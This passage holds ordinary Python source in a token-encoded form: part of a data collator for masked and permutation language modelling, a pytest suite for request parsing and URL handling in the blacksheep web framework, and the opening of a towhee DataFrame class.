value=1.0)<block_end>labels[~masked_indices]=-100# We only compute loss on masked tokens, -100 is default for CE compute # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK]) indices_replaced=torch.bernoulli(torch.full(labels.shape 0.8)).bool()&masked_indices<line_sep>inputs[indices_replaced]=self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)<line_sep># 10% of the time, we replace masked input tokens with random word indices_random=torch.bernoulli(torch.full(labels.shape 0.5)).bool()&masked_indices&~indices_replaced<line_sep>random_words=torch.randint(len(self.tokenizer) labels.shape dtype=torch.long)<line_sep>inputs[indices_random]=random_words[indices_random]<line_sep># The rest of the time (10% of the time) we keep the masked input tokens unchanged <return>inputs labels attention_mask<block_end><block_end>@dataclass<class_stmt>DataCollatorForPermutationLanguageModeling(DataCollatorMixin)<block_start>""" Data collator used for permutation language modeling. - collates batches of tensors, honoring their tokenizer's pad_token - preprocesses batches for permutation language modeling with procedures specific to XLNet """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>plm_probability:float=1/6<line_sep>max_span_length:int=5# maximum length of a span of masked tokens return_tensors:str="pt"<def_stmt>torch_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_torch_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.torch_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>tf_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_tf_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.tf_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>numpy_call self examples:List[Union[List[int] Any Dict[str Any]]]<arrow>Dict[str Any]<block_start><if_stmt>isinstance(examples[0] Mapping)<block_start>examples=[e["input_ids"]<for>e examples]<block_end>batch=_numpy_collate_batch(examples self.tokenizer)<line_sep>inputs,perm_mask,target_mapping,labels=self.numpy_mask_tokens(batch)<line_sep><return>{"input_ids":inputs "perm_mask":perm_mask "target_mapping":target_mapping "labels":labels}<block_end><def_stmt>torch_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked tokens to be predicted for a particular sequence are determined by the following algorithm: 0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_stmt>torch<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>inputs.size(1)%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details.")<block_end>labels=inputs.clone()<line_sep># Creating the mask and target_mapping tensors masked_indices=torch.full(labels.shape 0 dtype=torch.bool)<line_sep>target_mapping=torch.zeros((labels.size(0) labels.size(1) labels.size(1)) dtype=torch.float32)<for_stmt>i range(labels.size(0))# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). <block_start>cur_len=0<line_sep>max_len=labels.size(1)<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=torch.randint(1 self.max_span_length+1 (1 )).item()<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+torch.randint(context_length-span_length+1 (1 )).item()<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=torch.eye(labels.size(1))<block_end>special_tokens_mask=torch.tensor([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()] dtype=torch.bool )<line_sep>masked_indices.masked_fill_(special_tokens_mask value=0.0)<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels.eq(self.tokenizer.pad_token_id)<line_sep>masked_indices.masked_fill_(padding_mask value=0.0)<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs[masked_indices]=self.tokenizer.mask_token_id<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens perm_mask=torch.zeros((labels.size(0) labels.size(1) labels.size(1)) dtype=torch.float32)<for_stmt>i range(labels.size(0))# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order <block_start>perm_index=torch.arange(labels.size(1))<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=perm_index.reshape((-1 labels.size(1)<floordiv>2)).transpose(0 1)<line_sep># Permute the two halves such that they do not cross over perm_index=perm_index[torch.randperm(labels.size(1)<floordiv>2)]<line_sep># Flatten this out into the desired permuted factorisation order perm_index=torch.flatten(perm_index.transpose(0 1))<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index.masked_fill_(~masked_indices[i]&non_func_mask[i] -1)<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token perm_mask[i]=(perm_index.reshape((labels.size(1) 1))<le>perm_index.reshape((1 labels.size(1))))&masked_indices[i]<block_end><return>inputs.long() perm_mask target_mapping labels.long()<block_end><def_stmt>tf_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked tokens to be predicted for a particular sequence are determined by the following algorithm: 0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_from_stmt>random randint<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>tf.shape(inputs)[1]%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details.")<block_end>labels=tf.identity(inputs)<line_sep># Creating the mask and target_mapping tensors masked_indices=np.full(labels.shape.as_list() 0 dtype=np.bool)<line_sep>labels_shape=tf.shape(labels)<line_sep>target_mapping=np.zeros((labels_shape[0] labels_shape[1] labels_shape[1]) dtype=np.float32)<for_stmt>i range(len(labels))# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). <block_start>cur_len=0<line_sep>max_len=tf.shape(labels)[1]<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=randint(1 self.max_span_length+1)<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+randint(0 context_length-span_length+1)<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=np.eye(labels_shape[1])<block_end>masked_indices=tf.cast(tf.convert_to_tensor(masked_indices) dtype=tf.bool)<line_sep>target_mapping=tf.convert_to_tensor(target_mapping)<line_sep>special_tokens_mask=tf.convert_to_tensor([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.numpy().tolist()] )<line_sep>special_tokens_mask=tf.cast(special_tokens_mask dtype=tf.bool)<line_sep>masked_indices=masked_indices&~special_tokens_mask<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices=masked_indices&~padding_mask<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs=tf.where(masked_indices self.tokenizer.mask_token_id inputs)<line_sep>labels=tf.where(masked_indices labels -100)# We only compute loss on masked tokens perm_mask=[]<for_stmt>i range(len(labels))# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order # tf.range is the equivalent of torch.arange <block_start>perm_index=tf.range(labels_shape[1])<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=tf.transpose(tf.reshape(perm_index (-1 labels_shape[1]<floordiv>2)))<line_sep># Permute the two halves such that they do not cross over perm_index=tf.random.shuffle(perm_index)# Shuffles along the first dimension # Flatten this out into the desired permuted factorisation order perm_index=tf.reshape(tf.transpose(perm_index) (-1 ))<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index=tf.where(~masked_indices[i]&non_func_mask[i] -1 perm_index)<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token perm_mask.append((tf.reshape(perm_index (labels_shape[1] 1))<le>tf.reshape(perm_index (1 labels_shape[1])))&masked_indices[i])<block_end>perm_mask=tf.stack(perm_mask axis=0)<line_sep><return>tf.cast(inputs tf.int64) tf.cast(perm_mask tf.float32) target_mapping tf.cast(labels tf.int64)<block_end><def_stmt>numpy_mask_tokens self inputs:Any<arrow>Tuple[Any Any Any Any]<block_start>""" The masked tokens to be predicted for a particular sequence are determined by the following algorithm: 0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). 1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) 2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be masked 3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` 4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the sequence to be processed), repeat from Step 1. """<import_from_stmt>random randint<import_stmt>numpy<as>np<if_stmt>self.tokenizer.mask_token<is><none><block_start><raise>ValueError("This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer.")<block_end><if_stmt>inputs.shape[1]%2<ne>0<block_start><raise>ValueError("This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details.")<block_end>labels=np.copy(inputs)<line_sep># Creating the mask and target_mapping tensors masked_indices=np.full(labels.shape 0 dtype=np.bool)<line_sep>target_mapping=np.zeros((labels.shape[0] labels.shape[1] labels.shape[1]) dtype=np.float32)<for_stmt>i range(labels.shape[0])# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far). <block_start>cur_len=0<line_sep>max_len=labels.shape[1]<while_stmt>cur_len<l>max_len# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked) <block_start>span_length=randint(1 self.max_span_length+1)<line_sep># Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked context_length=int(span_length/self.plm_probability)<line_sep># Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length` start_index=cur_len+randint(0 context_length-span_length+1)<line_sep>masked_indices[i start_index:start_index+span_length]=1<line_sep># Set `cur_len = cur_len + context_length` cur_len<augadd>context_length<block_end># Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether, # the i-th predict corresponds to the i-th token. target_mapping[i]=np.eye(labels.shape[1])<block_end>special_tokens_mask=np.array([self.tokenizer.get_special_tokens_mask(val already_has_special_tokens=<true>)<for>val labels.tolist()] dtype=np.bool )<line_sep>masked_indices[special_tokens_mask]=0<if_stmt>self.tokenizer._pad_token<is><not><none><block_start>padding_mask=labels<eq>self.tokenizer.pad_token_id<line_sep>masked_indices[padding_mask]=0.0<block_end># Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc. non_func_mask=~(padding_mask|special_tokens_mask)<line_sep>inputs[masked_indices]=self.tokenizer.mask_token_id<line_sep>labels[~masked_indices]=-100# We only compute loss on masked tokens perm_mask=np.zeros((labels.shape[0] labels.shape[1] labels.shape[1]) dtype=np.float32)<for_stmt>i range(labels.shape[0])# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will # determine which tokens a given token can attend to (encoded in `perm_mask`). # Note: Length of token sequence being permuted has to be less than or equal to reused sequence length # (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation, # we assume that reused length is half of sequence length and permutation length is equal to reused length. # This requires that the sequence length be even. # Create a linear factorisation order <block_start>perm_index=np.arange(labels.shape[1])<line_sep># Split this into two halves, assuming that half the sequence is reused each time perm_index=perm_index.reshape((-1 labels.shape[1]<floordiv>2)).T<line_sep># Permute the two halves such that they do not cross over np.random.shuffle(perm_index)<line_sep># Flatten this out into the desired permuted factorisation order perm_index=perm_index.T.flatten()<line_sep># Set the permutation indices of non-masked (non-functional) tokens to the # smallest index (-1) so that: # (1) They can be seen by all other positions # (2) They cannot see masked positions, so there won't be information leak perm_index[~masked_indices[i]&non_func_mask[i]]=-1<line_sep># The logic for whether the i-th token can attend on the j-th token based on the factorisation order: # 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token # 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token perm_mask[i]=(perm_index.reshape((labels.shape[1] 1))<le>perm_index.reshape((1 labels.shape[1])))&masked_indices[i]<block_end><return>inputs.astype(np.int64) perm_mask target_mapping labels.astype(np.int64)<block_end><block_end>
<import_stmt>pytest<import_from_stmt>blacksheep Content Request scribe<import_from_stmt>blacksheep.contents FormPart MultiPartFormData<import_from_stmt>blacksheep.exceptions BadRequestFormat<import_from_stmt>blacksheep.messages get_absolute_url_to_path get_request_absolute_url<import_from_stmt>blacksheep.scribe write_small_request<import_from_stmt>blacksheep.server.asgi get_request_url get_request_url_from_scope incoming_request <import_from_stmt>blacksheep.testing.helpers get_example_scope<import_from_stmt>blacksheep.url URL<def_stmt>test_request_supports_dynamic_attributes <block_start>request=Request("GET" b"/" <none>)<line_sep>foo=object()<assert_stmt>(hasattr(request "foo")<is><false>) "This test makes sense if such attribute is not defined"<line_sep>request.foo=foo# type: ignore <assert_stmt>request.foo<is>foo<block_end># type: ignore @pytest.mark.asyncio@pytest.mark.parametrize("url,method,headers,content,expected_result" [(b"https://robertoprevato.github.io" "GET" [] <none> b"GET / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n" ) (b"https://robertoprevato.github.io" "HEAD" [] <none> b"HEAD / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n" ) (b"https://robertoprevato.github.io" "POST" [] <none> b"POST / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n" ) (b"https://robertoprevato.github.io/How-I-created-my-own-media-storage-in-Azure/" "GET" [] <none> b"GET /How-I-created-my-own-media-storage-in-Azure/ HTTP/1.1\r\nhost: robertoprevato.github.io"<concat>b"\r\ncontent-length: 0\r\n\r\n" ) (b"https://foo.org/a/b/c/?foo=1&ufo=0" "GET" [] <none> b"GET /a/b/c/?foo=1&ufo=0 HTTP/1.1\r\nhost: foo.org\r\ncontent-length: 0\r\n\r\n" ) ] )<async_keyword><def_stmt>test_request_writing url method headers content expected_result<block_start>request=Request(method url headers).with_content(content)<line_sep>data=b""<async_keyword><for_stmt>chunk scribe.write_request(request)<block_start>data<augadd>chunk<block_end><assert_stmt>data<eq>expected_result<block_end>@pytest.mark.parametrize("url,query,parsed_query" [(b"https://foo.org/a/b/c?hello=world" b"hello=world" {"hello":["world"]}) (b"https://foo.org/a/b/c?hello=world&foo=power" b"hello=world&foo=power" {"hello":["world"] "foo":["power"]} ) (b"https://foo.org/a/b/c?hello=world&foo=power&foo=200" b"hello=world&foo=power&foo=200" {"hello":["world"] "foo":["power" "200"]} ) ] )<def_stmt>test_parse_query url query parsed_query<block_start>request=Request("GET" url <none>)<assert_stmt>request.url.value<eq>url<assert_stmt>request.url.query<eq>query<assert_stmt>request.query<eq>parsed_query<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_can_read_json_data_even_without_content_type_header <block_start>request=Request("POST" b"/" <none>)<line_sep>request.with_content(Content(b"application/json" b'{"hello":"world","foo":false}'))<line_sep>json=<await>request.json()<assert_stmt>json<eq>{"hello":"world" "foo":<false>}<block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_if_read_json_fails_content_type_header_is_checked_json_gives_bad_request_format <block_start>request=Request("POST" b"/" [(b"Content-Type" b"application/json")])<line_sep>request.with_content(Content(b"application/json" b'{"hello":'))# broken json <with_stmt>pytest.raises(BadRequestFormat)<block_start><await>request.json()<block_end><block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_if_read_json_fails_content_type_header_is_checked_non_json_gives_invalid_operation <block_start>request=Request("POST" b"/" [])<line_sep>request.with_content(Content(b"application/json" b'{"hello":'))<line_sep># broken json; broken content-type <with_stmt>pytest.raises(BadRequestFormat)<block_start><await>request.json()<block_end><block_end><def_stmt>test_cookie_parsing <block_start>request=Request("POST" b"/" [(b"Cookie" b"ai=something; hello=world; foo=Hello%20World%3B;")])<assert_stmt>request.cookies<eq>{"ai":"something" "hello":"world" "foo":"Hello World;" }<block_end><def_stmt>test_cookie_parsing_multiple_cookie_headers <block_start>request=Request("POST" b"/" [(b"Cookie" b"ai=something; hello=world; foo=Hello%20World%3B;") (b"Cookie" b"jib=jab; ai=else;") ] )<assert_stmt>request.cookies<eq>{"ai":"else" "hello":"world" "foo":"Hello World;" "jib":"jab" }<block_end><def_stmt>test_cookie_parsing_duplicated_cookie_header_value <block_start>request=Request("POST" b"/" [(b"Cookie" b"ai=something; hello=world; foo=Hello%20World%3B; hello=kitty;")] )<assert_stmt>request.cookies<eq>{"ai":"something" "hello":"kitty" "foo":"Hello World;" }<block_end>@pytest.mark.parametrize("header,expected_result" [[(b"Expect" b"100-Continue") <true>] [(b"expect" b"100-continue") <true>] [(b"X-Foo" b"foo") <false>] ] )<def_stmt>test_request_expect_100_continue header expected_result<block_start>request=Request("POST" b"/" [header])<assert_stmt>expected_result<eq>request.expect_100_continue()<block_end>@pytest.mark.parametrize("headers,expected_result" [[[(b"Content-Type" b"application/json")] <true>] [[(b"Content-Type" b"application/problem+json")] <true>] [[(b"Content-Type" b"application/json; charset=utf-8")] <true>] [[] <false>] [[(b"Content-Type" b"application/xml")] <false>] ] )<def_stmt>test_request_declares_json headers expected_result<block_start>request=Request("GET" b"/" headers)<assert_stmt>request.declares_json()<is>expected_result<block_end><def_stmt>test_small_request_headers_add_through_higher_api <block_start>request=Request("GET" b"https://hello-world" <none>)<line_sep>request.headers.add(b"Hello" b"World")<line_sep>raw_bytes=write_small_request(request)<assert_stmt>b"Hello: World\r\n"<in>raw_bytes<block_end><def_stmt>test_small_request_headers_add_through_higher_api_many <block_start>request=Request("GET" b"https://hello-world" <none>)<line_sep>request.headers.add_many({b"Hello":b"World" b"X-Foo":b"Foo"})<line_sep>raw_bytes=write_small_request(request)<assert_stmt>b"Hello: World\r\n"<in>raw_bytes<assert_stmt>b"X-Foo: Foo\r\n"<in>raw_bytes<block_end><def_stmt>test_small_request_headers_add_through_lower_api <block_start>request=Request("GET" b"https://hello-world" <none>)<line_sep>request.add_header(b"Hello" b"World")<line_sep>raw_bytes=write_small_request(request)<assert_stmt>b"Hello: World\r\n"<in>raw_bytes<block_end>@pytest.mark.parametrize("initial_url,new_url" [(b"https://hello-world/" b"https://ciao-mondo/") (b"https://hello-world/one/two/three" b"https://hello-world/one/two/three/") (b"https://hello-world/one/two/three/" b"https://hello-world/one/two/three") ] )<def_stmt>test_request_can_update_url initial_url new_url<block_start>request=Request("GET" initial_url <none>)<assert_stmt>request.url.value<eq>initial_url<line_sep>request.url=URL(new_url)<assert_stmt>request.url.value<eq>new_url<block_end><def_stmt>test_request_content_type_is_read_from_content <block_start>request=Request("POST" b"/" []).with_content(MultiPartFormData([FormPart(b"a" b"world") FormPart(b"b" b"9000")]))<assert_stmt>request.content<is><not><none><assert_stmt>request.content_type()<eq>request.content.type<block_end>@pytest.mark.parametrize("scope,expected_value" [(get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 8000]) "http://127.0.0.1:8000/foo" ) (get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 80]) "http://127.0.0.1/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 44777]) "https://127.0.0.1:44777/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 443]) "https://127.0.0.1/foo" ) ] )<def_stmt>test_get_asgi_request_full_url scope expected_value<block_start>request=incoming_request(scope <none>)<line_sep>full_url=get_request_url(request)<assert_stmt>full_url<eq>expected_value<block_end><def_stmt>test_request_pyi <block_start>request=Request("GET" b"/" [(b"cookie" b"foo=aaa")])<line_sep>request.cookies["foo"]<eq>"aaa"<line_sep>request.get_cookie("foo")<eq>"aaa"<line_sep>request.get_first_header(b"cookie")<eq>b"foo=aaa"<line_sep>request.set_cookie("lorem" "ipsum")<line_sep>request.get_cookie("lorem")<eq>"ipsum"<block_end>@pytest.mark.parametrize("scope,trailing_slash,expected_value" [[{"scheme":"https" "path":"/" "server":("www.neoteroi.dev" 443)} <false> "https://www.neoteroi.dev/" ] [{"scheme":"https" "path":"/admin" "server":("www.neoteroi.dev" 443)} <false> "https://www.neoteroi.dev/admin" ] [{"scheme":"https" "path":"/admin" "server":("www.neoteroi.dev" 443)} <true> "https://www.neoteroi.dev/admin/" ] [{"scheme":"https" "path":"/admin" "server":("www.neoteroi.dev" 44777) } <true> "https://www.neoteroi.dev:44777/admin/" ] [{"scheme":"http" "path":"/admin" "server":("www.neoteroi.dev" 44777)} <true> "http://www.neoteroi.dev:44777/admin/" ] [{"scheme":"http" "path":"/admin" "server":("www.neoteroi.dev" 80)} <true> "http://www.neoteroi.dev/admin/" ] [{"scheme":"http" "path":"/admin" "server":("www.neoteroi.dev" 80) "query_string":b"foo=Hello%20World%20%C3%B8" } <false> "http://www.neoteroi.dev/admin?foo=Hello%20World%20%C3%B8" ] ] )<def_stmt>test_get_request_url_from_scope scope trailing_slash expected_value<block_start>result=get_request_url_from_scope(scope trailing_slash=trailing_slash)<assert_stmt>result<eq>expected_value<block_end><def_stmt>test_get_request_url_from_scope_raises_for_invalid_scope <block_start><with_stmt>pytest.raises(ValueError)<block_start>get_request_url_from_scope({})<block_end><block_end>@pytest.mark.parametrize("scope,expected_value" [(get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 8000]) "http://127.0.0.1:8000/foo" ) (get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 80]) "http://127.0.0.1/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 44777]) "https://127.0.0.1:44777/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 443]) "https://127.0.0.1/foo" ) ] )<def_stmt>test_get_request_absolute_url scope expected_value<block_start>request=incoming_request(scope)<assert_stmt>request.scheme<eq>scope["scheme"]<assert_stmt>request.host<eq>dict(scope["headers"])[b"host"].decode()<assert_stmt>request.base_path<eq>""<line_sep>absolute_url=get_request_absolute_url(request)<assert_stmt>str(absolute_url)<eq>f"{request.scheme}://{request.host}{request.path}"<assert_stmt>str(absolute_url)<eq>expected_value<block_end>@pytest.mark.parametrize("scope,base_path,expected_value" [(get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 8000]) "/api" "http://127.0.0.1:8000/api/foo" ) (get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 80]) "/api/" "http://127.0.0.1/api/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 44777]) "/api/oof" "https://127.0.0.1:44777/api/oof/foo" ) (get_example_scope("GET" "/foo" scheme="https" server=["127.0.0.1" 443]) "/api/oof/" "https://127.0.0.1/api/oof/foo" ) ] )<def_stmt>test_get_request_absolute_url_with_base_path scope base_path expected_value<block_start>request=incoming_request(scope)<assert_stmt>request.scheme<eq>scope["scheme"]<assert_stmt>request.host<eq>dict(scope["headers"])[b"host"].decode()<line_sep>request.base_path=base_path<line_sep>absolute_url=get_request_absolute_url(request)<assert_stmt>str(absolute_url)<eq>expected_value<block_end>@pytest.mark.parametrize("scope,path,expected_result" [(get_example_scope("GET" "/foo" scheme="http" server=["127.0.0.1" 8000]) "/sign-in" "http://127.0.0.1:8000/sign-in" ) (get_example_scope("GET" "/" scheme="http" server=["127.0.0.1" 8000]) "/authorization/callback" "http://127.0.0.1:8000/authorization/callback" ) (get_example_scope("GET" "/a/b/c/" scheme="http" server=["127.0.0.1" 8000]) "/authorization/callback" "http://127.0.0.1:8000/authorization/callback" ) ] )<def_stmt>test_get_request_absolute_url_to_path scope path expected_result<block_start>request=incoming_request(scope)<line_sep>url_to=get_absolute_url_to_path(request path)<assert_stmt>str(url_to)<eq>expected_result<block_end><def_stmt>test_can_set_request_host_and_scheme <block_start>scope=get_example_scope("GET" "/blacksheep/" scheme="http" server=["127.0.0.1" 80])<line_sep>request=incoming_request(scope)<line_sep>request.scheme="https"<line_sep>request.host="neoteroi.dev"<line_sep>absolute_url=get_request_absolute_url(request)<assert_stmt>str(absolute_url)<eq>"https://neoteroi.dev/blacksheep/"<block_end><def_stmt>test_can_set_request_client_ip <block_start>scope=get_example_scope("GET" "/blacksheep/" scheme="http" server=["127.0.0.1" 80])<line_sep>request=incoming_request(scope)<line_sep>request.client_ip<eq>scope["client"][0]<assert_stmt>request.original_client_ip<eq>"127.0.0.1"<line_sep># can set (e.g. when handling forwarded headers) request.original_client_ip="192.168.127.12"<assert_stmt>request.original_client_ip<eq>"192.168.127.12"<assert_stmt>scope["client"]<eq>("127.0.0.1" 51492)<block_end>
# Copyright 2021 Zilliz. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>threading<import_from_stmt>typing Iterable List Tuple Any<import_from_stmt>towhee.dataframe.array Array<class_stmt>DataFrame<block_start>""" A `DataFrame` is a collection of immutable, potentially heterogeneous blogs of data. Args: name (`str`): Name of the dataframe; `DataFrame` names should be the same as its representation. data (`list[towhee.Array]` or `list[Tuple]` or `dict[str, towhee.Array]`): The data of the `DataFrame`. Internally, the data will be organized in a column-based manner. """<def_stmt>__init__ self name:str=<none> data=<none> columns=<none> <block_start>self._name=name<line_sep>self._len=0<line_sep>self._sealed=<false><line_sep>self._lock=threading.Lock()<line_sep># For `data` is empty <if_stmt><not>data<block_start><pass><block_end># For `data` is `list` <elif_stmt>isinstance(data list)<block_start>container_types=set(type(i)<for>i data)<if_stmt>len(container_types)<ne>1<block_start><raise>ValueError('can not construct Dataframe from a list of hybrid data containers. Try list[Tuple] or list[Array].')<block_end>container_type=container_types.pop()<line_sep># For `data` is `list[tuple]` <if_stmt>container_type<is>tuple<block_start>self._from_tuples(data columns)<block_end># For `data` is `list[towhee.Array]` <elif_stmt>container_type<is>Array<block_start>self._from_arrays(data columns)<block_end><else_stmt><block_start><raise>ValueError('can not construct DataFrame from list[%s]'%(container_type))<block_end><block_end># For `data` is `dict` <elif_stmt>isinstance(data dict)<block_start>self._from_dict(data)<block_end># Unrecognized data types <else_stmt><block_start><raise>ValueError('can not construct DataFrame from data type %s'%(type(data)))<block_end><block_end><def_stmt>__getitem__ self key# access a row <block_start><if_stmt>isinstance(key 